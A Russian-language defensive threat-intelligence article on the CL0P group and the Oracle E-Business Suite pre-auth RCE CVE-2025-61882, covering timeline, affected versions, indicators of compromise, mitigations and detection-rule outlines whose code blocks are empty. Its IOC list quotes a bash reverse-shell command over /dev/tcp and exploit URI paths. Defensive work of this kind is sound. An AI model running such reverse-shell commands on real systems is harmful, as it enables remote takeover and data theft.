0. Краткий профиль группировки CL0P и обзор недавней кампании
В мае–июне 2023 года кибергруппа Clop организовала одну из самых резонансных кампаний последних лет: эксплойт уязвимости в популярном ПО для передачи файлов Progress MOVEit привёл к массовой компрометации данных у сотен организаций по всему миру. Это была не локальная утечка — это был сценарий «одна уязвимость → множество жертв»: операторская модель Clop позволила быстро выявлять ценные цели, извлекать гигабайты конфиденциальной информации и ставить перед пострадавшими двоякую дилемму — платить выкуп или рисковать публичной публикацией похищенных данных. Масштаб инцидента, его влияние на цепочки поставок и скорость распространения показали, насколько уязвимы современные централизованные сервисы и как одно скомпрометированной программное решение может стать инструментом «big game hunting». В этой статье мы подробно разберём ход кампании Clop, её последствия для корпоративной безопасности и уроки, которые должны усвоить организации, чтобы снизить риск повторения подобных событий.
CL0P — давняя криминальная группа, работающая в модели ransomware-as-a-service и специализирующаяся на масштабных операциях вымогательства: кража данных, массовые письма руководству и публичное давление через публикацию похищенного. В истории группы — крупные кампании против сервисов для обмена файлами и корпоративных платформ; типичная их тактика сочетает автоматизированное сканирование уязвимых сервисов, тихую эксфильтрацию ценных данных и последующие требования выкупа с угрозой публикации.
С конца августа — начала октября 2025 года исследователи зафиксировали активность против установок Oracle E-Business Suite, а в начале октября появились сообщения о массовых рассылках вымогательных писем руководству и о подтвержденных случаях эксплуатации критической уязвимости CVE-2025-61882. Хронология: первоначальное сканирование и обнаружение уязвимых инсталляций — эксплуатация уязвимости для получения доступа — закрепление присутствия и сбор/эксфильтрация данных — массовая рассылка доказательств похищения и вымогательство.
Модель атаки повторяет устоявшийся паттерн CL0P: автоматизированная разведка интернет-видимых сервисов, эксплуатация уязвимости (unauth RCE или аналогичный вектор) для входа в систему, распространение внутри сети и вытягивание критичных баз и отчётов, затем давление на руководство через публикации и целевые письма (double-extortion). Из-за широкой распространенности затронутого ПО и автоматизации рассылок такой подход позволяет быстро затронуть большое количество организаций и наносит значительные операционные и репутационные потери.
1. Технический разбор уязвимости CVE-2025-61882 (Oracle E-Business Suite)
1.1 Описание уязвимости (что это)
- Идентификатор: CVE-2025-61882.
- Компонент: Oracle Concurrent Processing (E-Business Suite) — модуль интеграции с BI Publisher (BI Publisher Integration).
- Влияние: уязвимость позволяет удалённо выполнить произвольный код без аутентификации через HTTP (pre-auth RCE). NVD оценил базовый CVSS 3.1 как 9.8 (критическая).
Oracle в своём Security Alert описывает проблему как «удалённо эксплуатируемую без аутентификации», приводя перечень затронутых версий (включая поддерживаемые строки 12.2.3–12.2.14) и варианты временного смягчения/фикса.
1.2 Какие версии и конфигурации затронуты
- Затронутые версии, по Oracle и NVD: Oracle E-Business Suite (EBS) версии 12.2.3 — 12.2.14 в части компонента Concurrent Processing / BI Publisher Integration. Оперативно сверяйте свой установленный релиз и примененные патчи.
1.3 Механизм эксплуатации (в общих чертах, без вредоносных деталей)
- Уязвимость возникает в обработке входящих HTTP-запросов к компонентам интеграции BI Publisher; специально сформированный HTTP-запрос может обойти проверки и привести к выполнению кода на стороне сервера. Из-за отсутствия требования аутентификации эксплойт может быть запущен удалённо против интернет-доступных инсталляций EBS. Поскольку речь о RCE, успешная эксплуатация даёт злоумышленнику полный контроль над процессом Oracle Concurrent Processing и, в ряде случаев, возможен переход к контролю над хост-системой.
1.4 Индикаторы компрометации (IOCs) и рекомендации по обнаружению
Признаки (популярные индикаторы)
- Необычные / неизвестные входящие HTTP-запросы к страницам/эндпоинтам Oracle EBS BI Publisher / Concurrent Processing, особенно содержащие нестандартные параметры или длинные полезные нагрузки.
- Появление новых либо изменённых файлов в каталогах EBS, где обычно не предполагается запись со стороны веб-интерфейсов.
- Неавторизованные процессы/слушающие порты, создание новых учетных записей или задействование привилегированных учёток для запуска процессов Oracle.
- Исходящие соединения к неизвестным хостам/облачным хранилищам, особенно сразу после подозрительных HTTP-запросов — признак эксфильтрации.
Примеры правил обнаружения
- В IDS/IPS / WAF — правило: логировать и блокировать нестандартные/очень длинные POST/GET-запросы к путям EBS BI Publisher (и любые с необычными заголовками).
- В EDR/SIEM (пример для Splunk-подобной системы) — поиск последовательности: HTTP запрос → создание нового процесса от службы oracle → незапланированный исходящий сетевой трафик; агрегировать сигналы и уведомлять SOC.
IPs:
200.107.207.26185.181.60.11161.97.99.49162.55.17.215104.194.11.200
SHA256:
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235daa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d411216fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
Email contacts:
support@pubstorm.comsupport@pubstorm.net
URLs / URI fragments:
/OA_HTML/configurator/UiServlet/OA_HTML/SyncServlet/oracle/apps/xdo/oa/template/webui/TemplatePreviewPGTemplateCode parameter starting with TMP or DEF
Commands:
sh -c /bin/bash -i >& /dev/tcp// 0>&1
1.5 Меры смягчения и защитные шаги (приоритетные)
- Немедленно применить официальные обновления/патчи от Oracle для CVE-2025-61882. Oracle выпустил Security Alert и рекомендации по применению обновлений. Применение патчей— первоочередная мера.
- Отключить/изолировать интернет-доступ к EBS, если невозможно быстро запатчить. По возможности — убрать прямой доступ к EBS из интернета, поместить за VPN/тройной зоной доступа и/или WAF. Многие CERT рекомендовали временно блокировать внешние подключения.
- Проверить логи на признаки эксплуатации (см. раздел IOCs выше) — веб-серверы, прокси, WAF, сетевые логи, EDR. Ищите необычную активность начиная с августа 2025 (ранние следы активности фиксировались с августа).
- Поменять/пересмотреть учётные данные и ключи, особенно если обнаружены признаки доступа: сбросить пароли администраторов EBS, SSH-ключи на серверах, пересмотреть интеграции и сервисные аккаунты.
- Подготовить план реагирования: сегментировать сеть, иметь резервные копии «вне сети», контакты IR-команды и юридического отдела. Участие компетентного IR-поставщика и уведомление регуляторов/CERT обычно обязательны при подтвержденной утечке данных.
3.6 Что делать, если вы уже получили письмо-вымогательство от «CL0P» / с утверждением о компрометации EBS
- Не взаимодействуйте напрямую с отправителем до консультации с IR-командой. Соберите доказательства (письма, вложения, хэши файлов), зафиксируйте заголовки и метаданные.
- Проведите полный аудит EBS и прилегающих сетей: логи, учетные записи, проводки, исходящие соединения.
- Сообщите в национальные CERT / правоохранительные органы и привлеките профессиональную помощь по реагированию на инциденты. Многие страны и отраслевые регуляторы требуют уведомления при утечке персональных данных.
2. Практические рекомендации для администраторов и руководства (шаги «до, во время, после»)
До (предотвращение)
- Обновляйте ПО по заранее составленному графику и мониторьте выпуски экстренных патчей от поставщиков (Oracle Security Alerts).
- Минимизируйте количество сервисов с публичным доступом; используйте WAF, VPN, многофакторную аутентификацию для административного доступа.
- Регулярно тестируйте резервные копии и план восстановления; храните резервные копии оффлайн.
Во время (при подозрении/фиксации)
- Изолируйте зараженные хосты, сохраните логи и снимки памяти (forensics), свяжитесь с IR-командой и регуляторами.
- Сохраните все журналы (логи) с SIEM, сетевых устройств, серверов и почты.
После атаки — восстановление и анализ
- Очистите или замените зараженные системы.
- Восстановите данные только из проверенных резервных копий.
- Определите, как именно злоумышленники проникли (фишинг, RDP, уязвимость, USB, социальная инженерия).
- Проанализируйте логи событий, сетевой трафик, подозрительные процессы.
- Устраните корневую причину: исправьте уязвимости, усиливайте контроль доступа, обновляйте антивирусные сигнатуры.
3. Краткая сводка и приоритеты действий (что делать прямо сейчас — для руководства ИТ/безопасности)
- Проверить, используете ли вы Oracle E-Business Suite версий 12.2.3–12.2.14 — если да, немедленно применить официальные патчи Oracle для CVE-2025-61882.
- Если немедленно пропатчить невозможно — закрыть интернет-доступ к EBS (изолировать, устранить прямой доступ) и включить WAF/контроли доступа.
- Запустить проверку на индикаторы компрометации (логи веб-серверов / прокси / EDR), особенно для активности с августа 2025 по настоящее время.
- Подготовить IR-процесс: сохранить логи, снять образы, уведомить соответствующие ведомства и, при необходимости, привлечь внешнюю forensic/IR-команду.
Конкретные правила обнаружения и примеры реализаций
A. Splunk (SPL) — поиск подозрительных запросов к EBS UI/Sync/TemplatePreview
Цель: найти HTTP-запросы к UiServlet/SyncServlet или TemplatePreview с подозрительными параметрами TemplateCode=TMP*/DEF*.
SPL:
| |
Пояснение: длинные запросы (>2000 символов) и TemplateCode начинающиеся с TMP/DEF — сильно подозрительны.
B. Elastic / Kibana — KQL пример
Цель: связать путь TemplatePreview и подозрительные параметры.
KQL (простой):
| |
Можно расширить условие длиной http.request.body.content_length > 2000.
C. Microsoft Sentinel / Azure Kusto (KQL) — HTTP + outbound connections
Цель: correlation rule: подозрительный входной HTTP → затем исходящее соединение (tcp) или запуск процесса java.
KQL (пример для AzureDiagnostics и Syslog/Network):
| |
Цель: выявить короткую цепочку «внешний HTTP-hit на EBS» → «внезапная исходящая связь» (эксфильтрация / C2).
D. Sigma (универсальный формат) — детекция UiServlet/SyncServlet/TemplatePreview
Sigma (пример, адаптируйте под вашу платформу):
| |
Используйте в SIEM для распаковки на конкретные движки.
E. Suricata / Snort — пример HTTP-pattern rule (IDS)
Suricata (HTTP inspect) — пример:
| |
Примечание: производительность — тестировать в lab. Правило ловит попытки с TemplateCode TMP/DEF в URI.
F. ModSecurity (WAF) — базовый блокирующий rule
ModSecurity (OWASP CRS style) — пример (блокировать запросы к TemplatePreview с TemplateCode TMP/DEF):
| |
Рекомендуется включать сначала в мониторинг (log) режим.
Если вам интересно почитать ещё классный контент, то приглашаю в свой Telegram канал @poxek
